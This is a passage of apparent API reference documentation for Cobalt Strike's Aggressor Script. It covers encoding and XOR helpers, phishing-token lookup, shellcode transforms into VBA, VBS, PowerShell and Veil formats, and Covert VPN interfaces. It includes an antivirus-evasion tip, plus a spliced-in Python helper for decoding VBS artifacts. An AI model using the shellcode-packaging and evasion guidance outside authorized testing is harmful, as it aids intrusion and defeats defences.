   local('$enc');
   $enc = str_chunk(base64_encode($2), 61);
   return strrep($data, '%%DATA%%', join("' + '", $enc));
}

Back to Top

str_decode

Convert a string of bytes to text with the specified encoding.

Arguments

$1 - the string to decode

$2 - the encoding to use.

Returns

The decoded text.

Example

# convert back to a string we can use (from UTF16-LE)
$text = str_decode($string, "UTF16-LE");

Back to Top

str_encode

Convert text to byte string with the specified character encoding.

Arguments

$1 - the string to encode

$2 - the encoding to use

Returns

The resulting string.

Example

# convert to UTF16-LE
$encoded = str_encode("this is some text", "UTF16-LE");

Back to Top

str_xor

Walk a string and XOR it with the provided key.

Arguments

$1 - the string to mask

$2 - the key to use (string)

Returns

The original string masked with the specified key.

Example

$mask  = str_xor("This is a string", "key");
$plain = str_xor($mask, "key");

Back to Top

sync_download

Sync a downloaded file (View -> Downloads) to a local path.

Arguments

$1 - the remote path to the file to sync. See &downloads

$2 - where to save the file locally

$3 - (optional) a callback function to execute when download is synced. The first argument to this function is the local path of the downloaded file.

Example

# sync all downloads
command ga {
   local('$download $lpath $name $count');
   foreach $count => $download (downloads()) {
      ($lpath, $name) = values($download, @("lpath", "name"));
   
      sync_download($lpath, script_resource("file $+ .$count"), lambda({ 
         println("Downloaded $1 [ $+ $name $+ ]"); 
      }, \$name));
   }
}

Back to Top

targets

Returns a list of host information in Cobalt Strike's data model.

Returns

An array of dictionary objects with information about each host.

Example

printAll(targets());

Back to Top

tbrowser

Generate the target browser GUI component.

Returns

The target browser GUI object (a javax.swing.JComponent)

Example

addVisualization("Target Browser", tbrowser());

See also

&showVisualization

Back to Top

tokenToEmail

Convert a phishing token to an email address.

Arguments

$1 - the phishing token

Returns

The email address or "unknown" if the token is not associated with an email.

Example

set PROFILER_HIT {
   local('$out $app $ver $email');
   $email = tokenToEmail($5);         
   $out = "\c9[+]\o $1 $+ / $+ $2 [ $+ $email $+ ] Applications";
   foreach $app => $ver ($4) {
      $out .= "\n\t $+ $[25]app $ver";
   }
   return "$out $+ \n\n";
}

Back to Top

transform

Transform shellcode into another format.

Arguments

$1 - the shellcode to transform

$2 - the transform to apply

Type               Description
array              comma-separated byte values
hex                Hex-encode the value
powershell-base64  PowerShell.exe-friendly base64 encoder
vba                a VBA array() with newlines added in
vbs                a VBS expression that results in a string
veil               Veil-ready string (\x##\x##)

Returns

The shellcode after the specified transform is applied

Example

println(transform("This is a test!", "veil"));

Back to Top

transform_vbs

Transform shellcode into a VBS expression that results in a string

Arguments

$1 - the shellcode to transform

$2 - the maximum length of a plaintext run

Notes

  • Previously, Cobalt Strike would embed its stagers into VBS files as several Chr() calls concatenated into a string.
  • Cobalt Strike 3.9 introduced features that required larger stagers. These larger stagers were too big to embed into a VBS file with the above method.
  • To get past this VBS limitation, Cobalt Strike opted to use Chr() calls for non-ASCII data and runs of double-quoted strings for printable characters.
  • This change, an engineering necessity, unintentionally defeated static anti-virus signatures for Cobalt Strike's default VBS artifacts at that time.
  • If you're looking for an easy evasion benefit with VBS artifacts, consider adjusting the plaintext run length in your Resource Kit.

Returns

The shellcode after this transform is applied

Example

println(transform_vbs("This is a test!", "3"));
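The Chr()/quoted-run layout described in the notes above can be folded back into the bytes it builds, which is what an analyst needs when triaging a VBS artifact or checking which plaintext run length a generator used. This Python helper is an added example, not Cobalt Strike's or the Resource Kit's code; it assumes the expression is a `&`-joined sequence of `Chr(N)` calls and double-quoted literals (with `""` for an embedded quote), a detail the page does not spell out, and the sample input is constructed.

```python
import re

# Constructed sample in the assumed shape: Chr() for non-printable bytes,
# double-quoted runs for printable text, joined with "&".
SAMPLE_VBS = 'Chr(252) & Chr(232) & "This" & Chr(0) & " is" & Chr(10) & "a ""test""!"'

# Tokenizer: Chr(N) | "literal" (with "" escapes) | & | whitespace | anything else
TOKEN = re.compile(r'Chr\(\s*(\d+)\s*\)|"((?:[^"]|"")*)"|(&)|(\s+)|(.)', re.I | re.S)
LITERAL = re.compile(r'"((?:[^"]|"")*)"')


def vbs_expr_to_bytes(expr):
    """Fold a Chr()/string-literal concatenation expression back into the bytes
    it evaluates to. Anything outside that grammar (other operators, named
    constants, unbalanced quotes) raises ValueError so the caller can send the
    sample to manual review instead of silently mis-decoding it."""
    out = bytearray()
    for m in TOKEN.finditer(expr):
        code, lit, _amp, _ws, other = m.groups()
        if code is not None:
            n = int(code)
            if n > 255:
                raise ValueError(f"Chr({n}) is outside the single-byte range")
            out.append(n)
        elif lit is not None:
            out += lit.replace('""', '"').encode("latin-1")
        elif other is not None:
            raise ValueError(f"unexpected token {other!r} at offset {m.start()}")
    return bytes(out)


def run_lengths(expr):
    """Lengths of the quoted plaintext runs; the maximum is the generator's
    'maximum length of a plaintext run', so a non-default value is a
    fingerprint of a tuned Resource Kit."""
    return [len(s.replace('""', '"')) for s in LITERAL.findall(expr)]


def is_well_formed(expr):
    """True when the expression consists only of Chr()/literal concatenation."""
    try:
        vbs_expr_to_bytes(expr)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    print(vbs_expr_to_bytes(SAMPLE_VBS))
    print("max plaintext run:", max(run_lengths(SAMPLE_VBS)))
```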

Back to Top

tstamp

Format a time into a date/time value. This value does not include seconds.

Arguments

$1 - the time [milliseconds since the UNIX epoch]

Example

println("The time is now: " . tstamp(ticks()));

See also

&dstamp

Back to Top

unbind

Remove a keyboard shortcut binding.

Arguments

$1 - the keyboard shortcut

Example

# restore default behavior of Ctrl+Left and Ctrl+Right
unbind("Ctrl+Left");
unbind("Ctrl+Right");

See also

&bind

Back to Top

url_open

Open a URL in the default browser.

Arguments

$1 - the URL to open

Example

command go {
   url_open("https://www.cobaltstrike.com/");
}

Back to Top

users

Returns a list of users connected to this team server.

Returns

An array of users.

Example

foreach $user (users()) {
   println($user);
}

Back to Top

vpn_interface_info

Get information about a VPN interface.

Arguments

$1 - the interface name

$2 - [Optional] the key to extract a value for

Returns

%info = vpn_interface_info("interface");

Returns a dictionary with the metadata for this interface.

$value = vpn_interface_info("interface", "key");

Returns the value for the specified key from this interface's metadata

Example

# create a script console alias to interface info
command interface {
   println("Interface $1");
   foreach $key => $value (vpn_interface_info($1)) {
      println("$[15]key $value");
   }
}

Back to Top

vpn_interfaces

Return a list of VPN interface names

Returns

An array of interface names.

Example

printAll(vpn_interfaces());

Back to Top

vpn_tap_create

Create a Covert VPN interface on the team server system.

Arguments

$1 - the interface name (e.g., phear0)

$2 - the MAC address ($null will make a random MAC address)

$3 - reserved; use $null for now.

$4 - the port to bind the VPN's channel to

$5 - the type of channel [bind, http, icmp, reverse, udp]

Example

vpn_tap_create("phear0", $null, $null, 7324, "udp");

Back to Top

vpn_tap_delete

Destroy a Covert VPN interface

Arguments

$1 - the interface name (e.g., phear0)

Example

vpn_tap_delete("phear0");

Back to Top